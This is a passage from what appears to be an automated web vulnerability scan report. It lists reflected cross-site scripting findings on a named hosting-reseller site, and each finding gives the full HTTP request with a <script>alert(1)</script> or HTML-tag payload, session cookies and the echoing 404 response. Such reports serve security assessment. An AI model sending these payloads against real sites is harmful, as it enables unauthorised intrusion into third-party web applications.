<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.phpbf141<script>alert(1)</script>f922cbd2239?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5480. http://www.resellerbase.com/web-service/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload affda<a>3abfaf01d98 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Searchaffda<a>3abfaf01d98&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Searchaffda<a>3abfaf01d98&opt=2 was not found on this server.</p>
...[SNIP]...

2.5481. http://www.resellerbase.com/web-service/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 299cd<a>dbdc6d8f404 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/search.php?keyword=search...299cd<a>dbdc6d8f404&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.php?keyword=search...299cd<a>dbdc6d8f404&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5482. http://www.resellerbase.com/web-service/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4890c<script>alert(1)</script>e853937a907 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&4890c<script>alert(1)</script>e853937a907=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&4890c<script>alert(1)</script>e853937a907=1 was not found on this server.</p>
...[SNIP]...

2.5483. http://www.resellerbase.com/web-service/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 62375<a>b5d516e031b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=262375<a>b5d516e031b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=262375<a>b5d516e031b was not found on this server.</p>
...[SNIP]...

2.5484. http://www.resellerbase.com/web-service/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 340f2<script>alert(1)</script>82d18262140 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service340f2<script>alert(1)</script>82d18262140/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service340f2<script>alert(1)</script>82d18262140/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5485. http://www.resellerbase.com/web-service/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ac81<script>alert(1)</script>8b9132f228c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes5ac81<script>alert(1)</script>8b9132f228c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes5ac81<script>alert(1)</script>8b9132f228c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5486. http://www.resellerbase.com/web-service/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7704d<script>alert(1)</script>e4db7b9d900 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/search.php7704d<script>alert(1)</script>e4db7b9d900?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php7704d<script>alert(1)</script>e4db7b9d900?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5487. http://www.resellerbase.com/web-service/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 874c9<a>975efc849fd was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/search.php?keyword=search...&Submit3=Search874c9<a>975efc849fd&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php?keyword=search...&Submit3=Search874c9<a>975efc849fd&opt=2 was not found on this server.</p>
...[SNIP]...

2.5488. http://www.resellerbase.com/web-service/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 3d165<a>b857b9e73d0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/search.php?keyword=search...3d165<a>b857b9e73d0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php?keyword=search...3d165<a>b857b9e73d0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5489. http://www.resellerbase.com/web-service/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d483<script>alert(1)</script>8a4bed2d572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2&8d483<script>alert(1)</script>8a4bed2d572=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2&8d483<script>alert(1)</script>8a4bed2d572=1 was not found on this server.</p>
...[SNIP]...

2.5490. http://www.resellerbase.com/web-service/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b277e<a>504ca73d96a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2b277e<a>504ca73d96a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2b277e<a>504ca73d96a was not found on this server.</p>
...[SNIP]...

2.5491. http://www.resellerbase.com/web-service/web-hosting/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7498f<script>alert(1)</script>29f6c40a269449eb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service7498f<script>alert(1)</script>29f6c40a269449eb1/web-hosting/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service7498f<script>alert(1)</script>29f6c40a269449eb1/web-hosting/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5492. http://www.resellerbase.com/web-service/web-hosting/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4d36<script>alert(1)</script>f501cd8677a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee4d36<script>alert(1)</script>f501cd8677a/web-hosting/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee4d36<script>alert(1)</script>f501cd8677a/web-hosting/ was not found on this server.</p>
...[SNIP]...

2.5493. http://www.resellerbase.com/web-service/web-hosting/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 622db<script>alert(1)</script>ed67bae98ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting622db<script>alert(1)</script>ed67bae98ea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting622db<script>alert(1)</script>ed67bae98ea/ was not found on this server.</p>
...[SNIP]...

2.5494. http://www.resellerbase.com/web-service/web-hosting/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb0e7<script>alert(1)</script>fc9c36ed2ace1ebbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/web-hostingfb0e7<script>alert(1)</script>fc9c36ed2ace1ebbb/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingfb0e7<script>alert(1)</script>fc9c36ed2ace1ebbb/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5495. http://www.resellerbase.com/web-service/web-hosting/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38efa<script>alert(1)</script>d075fc606a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/?38efa<script>alert(1)</script>d075fc606a9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/?38efa<script>alert(1)</script>d075fc606a9=1 was not found on this server.</p>
...[SNIP]...

2.5496. http://www.resellerbase.com/web-service/web-hosting/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 46bda<a>d270b165c56 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f46bda<a>d270b165c56 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f46bda<a>d270b165c56 was not found on this server.</p>
...[SNIP]...

2.5497. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 82aee<script>alert(1)</script>c2ae08e58eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service82aee<script>alert(1)</script>c2ae08e58eb/web-hosting/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service82aee<script>alert(1)</script>c2ae08e58eb/web-hosting/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5498. http://www.resellerbase.com/web-service/web-hosting/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
